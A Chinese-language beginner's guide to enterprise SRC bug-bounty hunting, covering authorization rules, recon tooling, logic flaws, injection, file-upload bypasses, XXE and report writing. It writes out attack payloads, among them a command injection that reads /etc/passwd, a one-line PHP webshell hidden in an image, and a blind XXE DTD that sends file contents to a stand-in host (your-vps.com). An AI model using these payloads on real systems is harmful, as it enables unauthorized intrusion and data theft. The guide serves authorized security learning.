1. 项目概述从零开始理解企业SRC与漏洞赏金如果你对网络安全感兴趣或者经常在技术社区看到有人讨论“挖洞”、“SRC”、“赏金”这些词心里痒痒但又觉得门槛太高那这篇文章就是为你准备的。我干了十多年安全从自己摸索到带团队深知新手入门时那种面对海量信息无从下手的迷茫。今天我们不谈那些高深莫测的底层原理和复杂的漏洞链就从一个最实际、最能产生正反馈的切入点开始企业SRC漏洞挖掘。简单来说SRC就是“安全应急响应中心”的缩写你可以把它理解为企业设立的一个“漏洞悬赏平台”。企业为了提升自身产品和服务的安全性会公开邀请安全研究人员也就是我们常说的“白帽子”来帮忙找漏洞。作为回报企业会根据漏洞的严重程度和影响范围支付一笔奖金这就是“漏洞赏金”。所以“挖SRC”本质上是一项双赢的活动你利用自己的技术发现安全隐患企业花钱买到了安全你还能获得实实在在的收益和行业认可。对于零基础的朋友最大的误区是觉得必须精通汇编、逆向、内核驱动才能入门。其实不然SRC漏洞挖掘覆盖的层面非常广从简单的逻辑漏洞、信息泄露到复杂的远程代码执行都有其对应的场景。入门阶段我们完全可以避开那些需要深厚二进制功底的领域从Web应用安全和业务逻辑安全入手。这两个领域门槛相对较低但产出稳定是积累第一桶金和信心的绝佳起点。接下来我会带你一步步拆解如何从一个完全不懂的小白成长为能独立挖掘漏洞并提交报告、最终拿到赏金的实践者。2. 核心思路与前期准备心态、目标与信息收集2.1 心态建设与目标设定在开始技术学习之前心态是第一道关。不要把挖漏洞想象成黑客电影里那种瞬间攻破系统的炫酷场景它更像是一场耐心、细致和逻辑推理的“狩猎”。首先放弃一夜暴富的幻想。顶级漏洞的赏金固然诱人但那需要长期的积累和一点运气。对于新手我们的首要目标是“开张”即提交第一个有效漏洞并获得确认。哪怕只是一个低危的信息泄露漏洞其带来的成就感和对流程的熟悉价值远超奖金本身。我建议将第一个月甚至前三个月的目标定为“熟悉流程提交3-5个有效低危漏洞”。其次建立合规与道德底线。SRC活动必须在平台规则和企业授权范围内进行。严禁对非授权目标进行测试严禁使用自动化工具进行恶意扫描如大规模爆破、DDos严禁在漏洞公开前或未经允许的情况下披露漏洞细节。一旦越界不仅拿不到赏金还可能面临法律风险。记住我们是以“安全研究员”的身份在帮助企业而不是攻击者。最后培养“攻击者思维”。你需要时刻思考“如果我是坏人我会怎么利用这个功能” 比如看到一个上传头像的功能普通人想的是传张照片而你应该立刻想到我能上传一个可执行的脚本文件吗服务器会怎么处理它这种思维转换需要刻意练习。2.2 高效的信息收集决定你的攻击面信息收集是漏洞挖掘的基石决定了你能看到多大的“攻击面”。对于企业SRC我们的目标通常是其官方网站、主业务APP、小程序、开放API等。2.2.1 子域名与资产发现一个大型企业往往不止一个www.abc.com。其邮件系统、后台管理系统、测试环境、合作伙伴接口可能分布在不同的子域名下。这些边缘系统通常安全防护较弱是理想的突破口。常用工具与方法被动收集利用Amass、Subfinder、OneForAll等工具通过搜索引擎、证书透明度日志、DNS数据集等公开渠道尽可能多地枚举子域名。字典爆破使用gobuster、ksubdomain等工具配合一个强大的子域名字典如subdomains-top1million-110000.txt对目标域名进行爆破。网络空间测绘引擎如FOFA、Shodan、ZoomEye。你可以使用语法如domainabc.com或icon_hash-247388890通过目标网站图标的哈希值来寻找相同资产来发现关联的IP、端口、服务。注意使用自动化工具进行子域名枚举时务必控制请求频率避免对目标服务器造成压力。有些SRC平台明确禁止使用扫描器进行主动扫描务必先阅读规则。2.2.2 端口与服务探测发现资产后需要知道它们开放了哪些服务。一个开放的非常规端口可能就是一个被遗忘的管理后台或测试接口。实操步骤对重要的IP或域名使用nmap进行端口扫描。初期可以使用快速扫描nmap -sS -T4 --min-rate 1000 target。对发现的开放端口如80, 443, 8080, 8443, 7001等用浏览器或curl命令访问查看是什么服务。特别关注22(SSH),21(FTP),3306(MySQL),6379(Redis),27017(MongoDB)等管理或数据库端口。如果它们意外地对公网开放且配置不当如弱口令可能就是严重漏洞。心得不要只扫描常见端口。一次全面的扫描应包含全端口-p-但这非常耗时且流量大仅建议在对单个重要IP进行深度测试时使用并确保符合平台规则。2.2.3 Web应用指纹识别确定是Web服务后需要识别其使用的技术栈这能指引你使用针对性的测试方法。工具与技巧Wappalyzer浏览器插件能快速识别前端框架、服务器、编程语言等。WhatWeb/WebAnalyze命令行工具能更详细地识别Web技术。手动观察查看HTTP响应头中的Server、X-Powered-By字段。观察URL路径特征如.php,.jsp,.asp,.action,.do。查看页面源代码中的注释、引用的JS/CSS库路径。观察错误页面信息可能暴露框架版本。2.2.4 目录与文件扫描寻找隐藏的目录、备份文件、配置文件、管理后台入口等。这些往往是开发人员疏忽留下的“宝藏”。工具选择dirsearch、gobuster、ffuf。ffuf因其速度和灵活性目前很受欢迎。字典是关键工具自带的字典往往不够用。你需要自己收集和整理字典特别是针对特定CMS如WordPress, Joomla的字典。一个强大的字典能极大提高发现概率。实战命令示例# 使用 dirsearch python3 dirsearch.py -u https://target.com -e php,html,js,bak,zip,tar.gz # 使用 ffuf ffuf -u https://target.com/FUZZ -w /path/to/wordlist.txt -mc 200,403,500注意事项扫描会产生大量请求务必使用-t线程参数控制并发数避免被封IP。对于重要的目标最好在深夜或周末等低峰期进行。3. 核心漏洞类型与实战挖掘技巧信息收集完毕后我们进入核心的漏洞挖掘环节。对于新手我强烈建议从以下几类漏洞入手它们技术门槛相对较低但出现频率高非常适合积累经验。3.1 逻辑漏洞业务流中的“思维盲区”逻辑漏洞不依赖特定的技术栈而是利用业务设计上的缺陷。它考验的是你对业务流程的理解和想象力。3.1.1 越权访问这是逻辑漏洞的“常青树”。分为垂直越权低权限用户获取高权限功能和水平越权用户A访问用户B的数据。垂直越权案例假设一个网址https://target.com/admin/delete_user?id123是管理员删除用户的接口。普通用户登录后直接尝试访问这个URL。如果系统只在前端隐藏了入口后端没做权限校验那么越权删除就发生了。水平越权案例查看个人订单的URL是https://target.com/order/view?order_id1001。将order_id改为1002如果返回了别人的订单信息就是水平越权。测试方法登录两个不同权限的账号如普通用户A、管理员B或用户A、用户B用Burp Suite抓包交换请求中的关键参数如用户ID、订单ID、功能路径或Token观察响应。3.1.2 业务流程绕过顺序绕过比如“手机号验证-设置密码-注册成功”三步。抓包后直接尝试跳过验证步骤访问设置密码或注册完成的接口。条件竞争多见于支付、优惠券领取、限量抢购场景。核心思想是“在系统处理完成前发出多个并发请求”。比如一个“余额提现”功能后端逻辑是“检查余额-扣款-打款”。如果检查余额和扣款不是原子操作你可以同时发起10个提现请求系统可能检查10次余额都够然后扣款10次导致多打钱。工具Burp Suite的Turbo Intruder插件是制造并发请求的利器。参数篡改修改请求中那些“看起来不会变”的参数。例如商品价格price100修改为price1运费shipping_fee10修改为shipping_fee-10。3.2 注入类漏洞与服务器的“直接对话”注入漏洞的原理是将用户输入的数据当成了代码来执行。这是最经典也最危险的漏洞之一。3.2.1 SQL注入攻击者通过构造特殊的输入改变后台SQL语句的原意从而执行任意SQL命令。手工探测在任何输入点搜索框、登录名、订单ID尝试输入单引号观察页面是否报错出现数据库错误信息。或者输入1 and 11和1 and 12看页面返回结果是否不同。自动化工具sqlmap是神器但必须谨慎使用。在SRC测试中直接对目标跑sqlmap是大忌很容易造成破坏或触发警报。正确的做法是用Burp Suite拦截到一个可疑的请求例如id1将其保存为request.txt。在本地或授权的测试环境中使用低风险模式进行探测sqlmap -r request.txt --batch --level2 --risk1如果确认存在注入再根据平台规则决定是否进一步获取数据。绝对禁止使用--dump-all等破坏性参数。盲注页面没有错误回显但可以通过条件判断如页面返回真假、响应时间差异来逐位推断数据。sqlmap可以自动化处理盲注。3.2.2 命令注入常见于网络设备、运维系统的功能中如“Ping测试”、“路由追踪”。测试点寻找调用系统命令的功能参数用户可控。Payload示例127.0.0.1; whoamiLinux/Unix127.0.0.1 dir(Windows)127.0.0.1 | cat /etc/passwd技巧使用时间延迟命令来判断如127.0.0.1 sleep 5如果页面响应慢了5秒很可能存在注入。3.3 文件上传与XXE从文件到代码执行3.3.1 文件上传漏洞这是新手最容易出成果的漏洞点之一。关键在于绕过服务器的检测机制。前端绕过检查文件类型仅依赖JavaScript。直接抓包修改Content-Type或文件后缀即可绕过。黑名单绕过服务器禁止上传.php,.jsp等。尝试其他可执行后缀.php5,.phtml,.phps,.jspx,.jspf。利用系统特性.php.(Windows会自动去除末尾点).php%20,.php::DATA(NTFS文件流)。大小写混淆.Php,.pHp。白名单绕过服务器只允许.jpg,.png,.gif。图片马制作一个包含PHP代码的图片文件。用copy命令Windowscopy normal.jpg /b shell.php /a webshell.jpg。然后利用文件包含漏洞或解析漏洞来执行其中的代码。解析漏洞特定服务器/中间件解析文件的特性。IIS 5.x/6.0上传shell.php;.jpg IIS会将其解析为.php。Nginx 畸形解析上传shell.jpg 访问shell.jpg/.php 如果配置不当Nginx会将其交给PHP解析。内容检测绕过服务器检测文件内容头。在PHP代码前添加图片的文件头如GIF89a。利用exif函数?php //? system($_GET[cmd]); ? 保存为.jpg 需要服务器开启exif扩展并存在相关漏洞。重要心得上传成功后不要只盯着返回的路径。要查看页面HTML源码、JS文件、网络请求文件路径可能藏在某个JSON响应或重定向头里。同时尝试常见的存储目录如/uploads/,/images/,/static/,/public/。3.3.2 XXE漏洞XML外部实体注入。当应用解析用户可控的XML输入时如果未禁用外部实体引用可能导致文件读取、内网探测甚至命令执行。如何发现寻找任何接受XML格式输入的功能点如API接口特别是Content-Type: application/xml、文件上传如Office文档、SVG图像本质是XML、单点登录SAML等。经典Payload?xml version1.0? !DOCTYPE test [ !ENTITY xxe SYSTEM file:///etc/passwd ] userxxe;/user盲测XXE如果无回显可以尝试让服务器访问你的公网服务器通过DNS或HTTP日志来确认。!ENTITY % dtd SYSTEM http://your-vps.com/evil.dtd %dtd;其中evil.dtd内容为!ENTITY % file SYSTEM file:///etc/passwd !ENTITY % eval !ENTITY #x25; exfil SYSTEM http://your-vps.com/?data%file; %eval; %exfil;3.4 信息泄露与配置错误被忽视的“宝藏”这类漏洞技术含量不高但危害可能很大且非常常见。敏感文件泄露.git目录、.svn目录、.DS_Store文件泄露源代码WEB-INF/web.xml泄露Java应用配置备份文件.bak,.swp,.old泄露旧版本源码。配置错误目录遍历URL参数如?file../../../../etc/passwd。CORS错误配置允许来自任意源的请求可能导致用户数据被恶意网站窃取。错误的HTTP头X-Powered-By暴露版本缺少安全头如HSTS,CSP,X-Frame-Options。云存储桶公开访问AWS S3、阿里云OSS等存储桶配置为“公开读”导致大量内部文件、用户数据泄露。常用工具awscli,ossutil 或在线扫描平台。测试方法养成习惯在浏览器开发者工具的“网络”选项卡中仔细查看每一个请求的响应头。用curl -I命令查看HTTP头。使用nuclei这类工具它有很多针对信息泄露的检测模板。4. 漏洞挖掘实战流程与工具链知道了漏洞类型我们还需要一套高效的实战流程和工具组合。4.1 单点测试流程当你锁定一个具体的功能点如登录、注册、上传、查询时遵循以下步骤正常操作首先像普通用户一样完整地走一遍流程用Burp Suite代理模式记录下所有请求。参数枚举在Burp的Proxy - HTTP history中找到目标请求右键发送到Repeater。在Repeater中逐一修改每一个参数GET/POST/Cookie/Header观察响应变化。思考每个参数的可能作用。模糊测试对于关键参数发送到Intruder。使用预置的字典如FuzzDB,SecLists中的字典对参数进行批量替换测试寻找异常响应如错误信息、响应时间变长、状态码不同。逻辑推理结合业务场景思考可能的逻辑漏洞。比如修改“数量”参数为负数修改“用户ID”为他人跳过验证步骤深度交互如果发现疑似注入点进行更精细的手工测试如添加、and 11。如果发现文件上传系统性地尝试各种绕过手法。4.2 核心工具链配置与使用心得工欲善其事必先利其器。一套顺手的工具能极大提升效率。Burp Suite Professional核心中的核心。社区版功能受限专业版是生产力工具。Scanner自动化漏洞扫描。虽然好用但在SRC测试中慎用容易产生大量流量触发警报。建议仅对已授权的单个请求或目录进行扫描。Repeater手动测试和调试请求必备。Intruder用于参数爆破、模糊测试。Collaborator用于检测盲注、XXE、SSRF等“带外”漏洞极其重要。Extensions安装Logger,AuthMatrix,Turbo Intruder等插件扩展功能。浏览器与插件Chrome/Firefox配合开发者工具。Wappalyzer指纹识别。Hack-Tools/FoxyProxy快速切换代理。信息收集与扫描nmap端口扫描。ffuf/dirsearch目录扫描。subfinder/amass子域名枚举。nuclei基于模板的漏洞扫描。这是神器社区有数千个漏洞检测模板从信息泄露到RCE都有。用它来对收集到的资产进行快速初筛效率极高。命令nuclei -u https://target.com -t ~/nuclei-templates/专项测试工具sqlmapSQL注入谨慎使用。xsstrike/dalfoxXSS检测。git-dumper当发现.git泄露时用它来完整下载源码。工具使用心法工具是辅助思维是主导。不要依赖工具的自动化报告。任何一个由工具自动报告的漏洞都必须经过手动复现和验证理解其原理和触发条件才能写出高质量的报告。5. 报告编写、提交与沟通艺术挖到漏洞只是成功了一半如何清晰、专业地报告漏洞直接关系到它能否被快速确认和获得应有的评级。5.1 编写一份优秀的漏洞报告报告的目标是让完全不了解情况的安全工程师能快速复现并理解漏洞。标题一句话概括。例如“[目标域名] 某处存在未授权访问漏洞可查看他人订单详情”。漏洞等级参考CVSS标准或该SRC平台的自定义标准进行初步自评高危、中危、低危。不要夸大。漏洞类型SQL注入、越权访问、命令注入等。影响组件/URL精确到存在漏洞的URL地址。漏洞描述背景简要说明相关功能如“用户订单查询页面”。缺陷清晰说明哪里出了问题如“后端在处理order_id参数时未校验当前登录用户是否拥有该订单的访问权限”。原理简要的技术原理可选但能体现专业性。复现步骤这是核心。像写食谱一样一步一步来。准备两个测试账号userA(邮箱/密码),userB。使用userA登录进入订单页面抓包得到请求GET /api/order?order_id1001。在Burp Repeater中将Cookie替换为userB的会话Token或将order_id参数修改为userB的订单ID1002。发送请求服务器返回了userB的订单详细信息截图证明。证明截图/视频请求/响应Burp Repeater或浏览器开发者工具中包含请求头和响应体的完整截图。关键信息用红框圈出修改的参数和返回的敏感数据。视频对于复杂的逻辑漏洞或需要多步交互的录屏GIF是最佳选择。影响与危害说明这个漏洞可能造成什么后果如“导致任意用户敏感信息泄露包括姓名、地址、电话等”。修复建议给出具体、可操作的修复方案如“在后端接口处理逻辑中增加权限验证if (current_user_id ! order.owner_id) { return forbidden(); }”。5.2 提交与跟进选择正确的SRC平台大型互联网公司如腾讯、阿里、字节跳动、小米都有自家的SRC。也有第三方平台如补天、漏洞盒子汇聚了众多厂商。新手可以从有“新手区”或“公益SRC”漏洞无奖金但计积分排名的平台开始练手。仔细阅读规则每个平台的规则范围、禁止测试项、评分标准都不同。违反规则可能导致漏洞被忽略甚至被封号。一次性提交清晰报告按照上述模板准备好所有材料后再提交避免来回补充信息。保持耐心与专业沟通审核需要时间几天到几周。如果审核人员对漏洞有疑问他们会留言。回复时保持礼貌和专业提供额外信息或澄清。如果对评级有异议可以依据平台规则和漏洞实际危害有理有据地申诉。6. 从入门到精通的成长路径与避坑指南6.1 新手常见问题与排查问题1我按照教程测试为什么一个漏洞都找不到原因目标太“硬”。新手一上来就怼主站、怼核心业务这些地方通常经过专业安全团队反复审计漏洞很少。解决转向“边缘资产”。专注于信息收集阶段发现的那些子域名、测试环境(test、dev)、老旧系统(old、v1)、第三方合作系统。这些往往是安全防护的薄弱环节。问题2工具扫描报告有漏洞但手动无法复现。原因工具可能存在误报或者漏洞条件非常苛刻需要特定登录状态、参数组合。解决永远以手动复现为准。仔细分析工具报告的Payload和触发点在Burp Repeater中精确还原请求并尝试多种上下文。如果无法复现可能就是误报。问题3我找到了一个疑似漏洞但不确定危害有多大该不该报解决报只要确认存在安全问题如信息泄露、逻辑缺陷哪怕危害不大也可以作为“低危”或“提示”级别提交。这能让你熟悉流程同时审核人员的反馈本身就是极好的学习材料。问题4测试时不小心把网站搞慢了/触发了警报怎么办解决立即停止所有测试。如果是自动化工具导致的检查工具配置降低并发线程、增加延迟。在SRC规则允许的范围内测试。如果可能在测试非核心业务时选择流量低峰期。6.2 技能提升与资源推荐持续学习靶场在PentesterLab,HackTheBox,TryHackMe,DVWA,WebGoat等在线靶场或本地环境中练习这是无风险提升技术的最佳途径。漏洞报告学习多读各大SRC平台公开的漏洞报告如补天、漏洞盒子的已公开案例学习别人的挖掘思路和报告写法。跟进新技术关注安全社区、博客、会议如BlackHat、DEFCON的演讲了解新的攻击手法和漏洞类型如云安全、API安全、AI系统安全。构建知识体系网络基础HTTP/HTTPS协议、TCP/IP、DNS。Web技术栈前端HTML/JS、后端PHP/Java/Python/Go常见框架、数据库SQL语法、服务器Nginx/Apache/IIS配置。安全核心OWASP Top 10每年必看它是Web安全的纲领性文件。我个人从零基础走过来的体会是漏洞挖掘就像解谜游戏需要好奇心、耐心和系统性思维。最初几个月可能颗粒无收这非常正常。关键是把每一次测试、每一个请求、甚至每一次失败都当成学习过程。当你提交的第一个漏洞被确认时那种感觉是无与伦比的。从那以后你会进入一个“正反馈循环”技术提升 - 发现漏洞 - 获得奖励/认可 - 动力更足 - 技术再提升。这条路没有捷径但每一步都算数。最后一个小建议建立一个自己的“武器库”笔记记录你常用的Payload、绕过技巧、工具命令和遇到的有趣案例这将成为你最宝贵的财富。
的完整指南)
